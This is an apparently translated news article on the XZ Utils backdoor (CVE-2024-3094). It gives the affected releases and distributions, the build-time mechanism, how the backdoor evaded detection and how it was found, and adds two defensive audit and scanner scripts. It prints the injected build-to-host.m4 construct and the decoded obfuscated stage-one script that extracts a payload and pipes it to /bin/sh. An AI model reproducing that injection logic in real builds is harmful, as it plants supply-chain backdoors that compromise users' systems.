A backdoor (CVE-2024-3094) has been identified in the XZ Utils package, which includes the liblzma library and the utilities for working with compressed data in the ".xz" format. The backdoor allows data processed by applications linked with liblzma to be intercepted and modified. The main target of the backdoor is the OpenSSH server, which in some distributions is linked with the libsystemd library, which in turn uses liblzma. Linking sshd against the vulnerable library lets attackers gain access to the SSH server without authentication.
The backdoor was present in releases 5.6.0 and 5.6.1, published on February 24 and March 9, which made their way into some distributions and repositories, for example Gentoo, Arch Linux, Debian sid/unstable, Fedora Rawhide and 40-beta, openSUSE Factory and Tumbleweed, LibreELEC, Alpine edge, Solus, NixOS unstable, OpenIndiana, OpenMandriva rolling, pkgsrc current, Slackware current and Manjaro testing. All users of the xz 5.6.0 and 5.6.1 releases are advised to downgrade immediately to version 5.4.6.
A mitigating factor is that the backdoored liblzma version did not make it into the stable releases of the major distributions, although it did affect openSUSE Tumbleweed and Fedora 40-beta. Arch Linux and Gentoo ship a vulnerable version of xz but are not exposed to the attack, because they do not apply the systemd-notify patch to openssh, which is what makes sshd link to liblzma. The backdoor only affects x86_64 systems based on the Linux kernel and the Glibc C library.
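The following shell script is an added example written for this page, not code from the article or from XZ Utils. It checks the two things the paragraphs above make relevant for a single host: whether the installed xz is one of the two backdoored releases, and whether the sshd binary links liblzma at all (the ldd output makes the indirect libsystemd -> liblzma dependency visible). It assumes that `xz --version` prints "xz (XZ Utils) <version>" on its first line and that `ldd` is available; the sshd path defaults to /usr/sbin/sshd, the path the article names, and the function names are mine.

```shell
#!/bin/sh
# Added audit helper, not part of the article or of XZ Utils. It answers, for one
# host, the two questions the article raises: is the installed xz one of the two
# backdoored releases, and does sshd link (directly or through libsystemd) to liblzma?
# Assumptions: `xz --version` prints "xz (XZ Utils) <version>" on its first line,
# and `ldd` is available to list sshd's resolved shared-library dependencies.

# Return 0 when the version string is one of the backdoored releases named in the article.
xz_version_affected() {
    case "$1" in
        5.6.0|5.6.1) return 0 ;;
        *) return 1 ;;
    esac
}

# Read `xz --version` output on stdin and print just the version number,
# e.g. "xz (XZ Utils) 5.6.1" -> "5.6.1".
parse_xz_version() {
    sed -n 's/^xz (XZ Utils) \([0-9][0-9.]*\).*/\1/p' | head -n 1
}

# Read `ldd <binary>` output on stdin; return 0 if liblzma appears among the
# resolved dependencies. ldd lists transitive dependencies too, so the
# sshd -> libsystemd -> liblzma chain from the article shows up here.
ldd_output_links_liblzma() {
    grep -q 'liblzma\.so'
}

# Report on the running host. The sshd path may be overridden as $1.
audit_host() {
    sshd_path="${1:-/usr/sbin/sshd}"
    if command -v xz >/dev/null 2>&1; then
        ver=$(xz --version 2>/dev/null | parse_xz_version)
        if xz_version_affected "$ver"; then
            echo "xz $ver: backdoored release, downgrade to 5.4.6"
        else
            echo "xz ${ver:-unknown}: not one of the backdoored releases"
        fi
    else
        echo "xz not found in PATH"
    fi
    if [ -x "$sshd_path" ] && command -v ldd >/dev/null 2>&1; then
        if ldd "$sshd_path" 2>/dev/null | ldd_output_links_liblzma; then
            echo "$sshd_path links liblzma: exposed if the installed xz is 5.6.0 or 5.6.1"
        else
            echo "$sshd_path does not link liblzma"
        fi
    else
        echo "$sshd_path not present or ldd unavailable; skipping link check"
    fi
}

audit_host "$@"
```

Run it as `sh audit.sh` (optionally with another sshd path as the first argument). The version check is an exact match on the two releases rather than a range comparison, because only those two releases carried the backdoor; the ldd check reports exposure even when the liblzma dependency is indirect, which is the case the article describes for distributions with the systemd-notify patch.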
The code that activates the backdoor was hidden in m4 macros in the build-to-host.m4 file, which the automake toolkit uses at build time. During the build, a sequence of complex obfuscated operations over archives used to test correct operation (bad-3-corrupt_lzma2.xz, good-large_compressed.lzma) produced an object file containing malicious code. This code was included in the liblzma library and altered the logic of some of its functions. The m4 macros that activate the backdoor were included in the release tarballs but were absent from the Git repository. The malicious test archives, however, were present in the repository, which means whoever injected the backdoor had access to both the repository and the release-generation process.
When liblzma is used by applications, the malicious changes can be used to intercept or modify data and to interfere with the operation of sshd. Specifically, the malicious code replaced the RSA_public_decrypt function in order to bypass sshd authentication. The backdoor included protection against detection and did not manifest itself when the LANG and TERM environment variables were set (i.e. when the process was run in a terminal) and the LD_DEBUG and LD_PROFILE environment variables were not set. It also activated only when the /usr/sbin/sshd executable was run. The backdoor further included means of detecting execution in a debugging environment.
Specifically, the m4/build-to-host.m4 file uses the following construct:

gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
…
gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
In the first build stage, the grep operation finds the file tests/files/bad-3-corrupt_lzma2.xz, which, when unpacked, produces the following script:

####Hello####
#345U211267$^D330^W
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status; then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####
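As an added example, not code from the article or from the xz project, the following shell script scans an unpacked source tarball for the two artefacts just described: a build-to-host.m4 that defines gl_am_configmake / gl_path_map (names the article quotes from the injected macro, which the genuine gnulib macro does not use) and any file containing a marker line matching the injected grep pattern, which is how the build stage locates its payload archive. The tree layout (m4/, tests/files/) follows the article; the function names and the sample files in the usage are mine.

```shell
#!/bin/sh
# Added source-tree scanner, not part of the article or of XZ Utils. It looks in an
# unpacked release tarball for the two artefacts the article describes: an
# m4/build-to-host.m4 that carries the injected gl_am_configmake / gl_path_map
# logic, and any file containing a "####xxxxx####" marker line, which is exactly
# what the injected grep searches for.
# Usage: scan_tree /path/to/unpacked/xz-<version>   (exit 0 = clean, 1 = findings)

# The marker regex quoted from the injected macro (grep -E syntax):
# four '#', five alphanumerics, four '#', at end of line.
MARKER_RE='#{4}[[:alnum:]]{5}#{4}$'

# Return 0 if the given m4 file contains the injected variable names.
m4_is_suspicious() {
    grep -Eq 'gl_am_configmake|gl_path_map' "$1" 2>/dev/null
}

# Print the paths of all files under $1 that contain a marker line
# (-a treats binary files as text, as the injected grep does).
find_marker_files() {
    grep -aErls "$MARKER_RE" "$1" 2>/dev/null
}

# Scan a source tree, print findings, return 0 if clean and 1 if anything is suspicious.
scan_tree() {
    tree="$1"
    findings=0
    m4file="$tree/m4/build-to-host.m4"
    if [ -f "$m4file" ] && m4_is_suspicious "$m4file"; then
        echo "SUSPICIOUS: $m4file defines gl_am_configmake/gl_path_map"
        findings=$((findings + 1))
    fi
    marker_files=$(find_marker_files "$tree")
    if [ -n "$marker_files" ]; then
        echo "SUSPICIOUS: marker line(s) found in:"
        echo "$marker_files"
        findings=$((findings + $(printf '%s\n' "$marker_files" | wc -l)))
    fi
    [ "$findings" -eq 0 ]
}
```

Both checks are cheap enough to run against every tarball before a build. A hit on the marker regex is not proof on its own (any file with such a line matches), but a marker inside a test-data archive together with an m4 file that defines those variables is the combination the article describes.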
How the attackers gained access to the xz project infrastructure remains unclear. It is also unclear how many users and projects were affected by the backdoor. The alleged author of the backdoor (JiaT75 - Jia Tan), who committed the archives containing the malicious code to the repository, corresponded with Fedora developers and sent pull requests to Debian related to moving the distributions to the xz 5.6.0 branch, and did not raise suspicion, since he had taken part in xz development for the past two years and was the second-largest contributor. Besides the xz project, the backdoor author also contributed to the xz-java and xz-embedded packages. Moreover, Jia Tan had recently been selected as a maintainer of the XZ Embedded project, which is used in the Linux kernel.
The malicious change was discovered after an analysis of excessive CPU consumption and of errors reported by valgrind when connecting over ssh to systems running Debian sid. It is worth noting that the xz 5.6.1 release included changes prepared by the backdoor author in response to complaints about sshd slowness and crashes that appeared after upgrading to xz 5.6.0, which contained the backdoor. Moreover, last year Jia Tan introduced changes incompatible with the "-fsanitize=address" checking mode, which led to it being disabled during fuzzing tests.
Source: opennet.ru
